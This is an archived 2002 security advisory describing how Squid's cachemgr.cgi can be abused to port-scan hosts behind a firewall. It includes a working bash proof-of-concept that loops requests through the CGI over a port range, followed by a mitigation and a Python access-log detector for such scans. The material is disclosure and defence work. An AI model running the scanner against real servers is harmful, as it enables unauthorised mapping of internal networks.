
Squid - cachemgr.cgi shipped with Squid can be fooled into scanning hosts behind firewalls



5th Feb 2002 [SBWID-5065]
COMMAND

	cachemgr.cgi shipped with Squid can be fooled into scanning hosts behind
	firewalls

SYSTEMS AFFECTED

	Tested on : Linux Redhat 6.2
		    Squid 2.3STABLE4
		    Apache 1.3.12

	

PROBLEM

	From Francisco Sáa Muñoz's advisory [http://www.ip6seguridad.com]:

	Due to a misconfiguration on Apache and Squid, it is possible to use
	cachemgr.cgi shipped with Squid to scan hosts under the corporate
	firewall.

	There is a lil' script to demonstrate the error, not so clean, but
	useful.
	

	

	--- Begin nasty code miscachemgr.cgi ---
	#!/bin/bash -x

	# Port scanning using a misconfigured squid
	# using open apache

	# Usage miscachemgr host_vuln host_to_scan end_port

	# Concept: Jacobo Van Leeuwen & Francisco Sáa Muñoz
	# Coded by Francisco Sáa Muñoz
	# IP6 [Logic Control]

	PORT=1
	ONE='/cgi-bin/cachemgr.cgi?host='
	TWO='&port='
	THREE='&user_name=&operation&auth='

	mkdir from_$1_to_$2

	while [ $PORT -lt $3 ]; do

	# lynx -dump http://$1/cgi-bin/cachemgr.cgi?host=\
	# $2&port=$PORT&user_name=&operation=authenticate&auth= > \
	# port_$1_to_$2/$PORT.log 2>&1

	lynx -dump http://$1$ONE$2$TWO$PORT$THREE > from_$1_to_$2/$PORT.log 2>&1
	let PORT=PORT+1

	done
	--- End nasty Code ---

	

	

SOLUTION

	Deny access to the cgi
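
	To check whether the CGI has already been used this way, the following
	added example (not part of the advisory) reads Apache access-log lines
	and reports clients that asked cachemgr.cgi to contact several distinct
	ports on one host. The log lines, the name find_cachemgr_scans and the
	min_ports threshold are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample in Apache common log format (not taken from the advisory).
_LINE = '{c} - - [05/Feb/2002:10:00:0{i} +0000] "GET {u} HTTP/1.0" 200 512'
_CGI = "/cgi-bin/cachemgr.cgi?host={h}&port={p}&user_name=&operation&auth="
SAMPLE_LOG = "\n".join(
    [_LINE.format(c="192.0.2.10", i=i, u=_CGI.format(h="10.0.0.5", p=p))
     for i, p in enumerate((21, 22, 23, 25))]
    + [_LINE.format(c="192.0.2.20", i=5, u=_CGI.format(h="localhost", p=3128)),
       _LINE.format(c="192.0.2.30", i=6, u="/index.html")]
)

REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+)')
PORT = re.compile(r"[0-9]{1,5}")


def find_cachemgr_scans(log_text, min_ports=3):
    """Map (client, target_host) -> sorted ports for every client that asked
    cachemgr.cgi to contact at least min_ports distinct ports on one host."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue  # not a parsable request line
        client, url = m.groups()
        parts = urlsplit(url)
        if not parts.path.lower().endswith("/cachemgr.cgi"):
            continue
        query = parse_qs(parts.query)
        host = query.get("host", [""])[0]
        port = query.get("port", [""])[0]
        if host and PORT.fullmatch(port):
            seen[(client, host)].add(int(port))
    return {k: sorted(v) for k, v in seen.items() if len(v) >= min_ports}


if __name__ == "__main__":
    for (client, host), ports in find_cachemgr_scans(SAMPLE_LOG).items():
        print(f"{client} probed {host} via cachemgr.cgi on ports {ports}")
```

	Parameters sent in a POST body are not recorded in the access log, so
	this only sees GET requests like the ones the script above makes.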

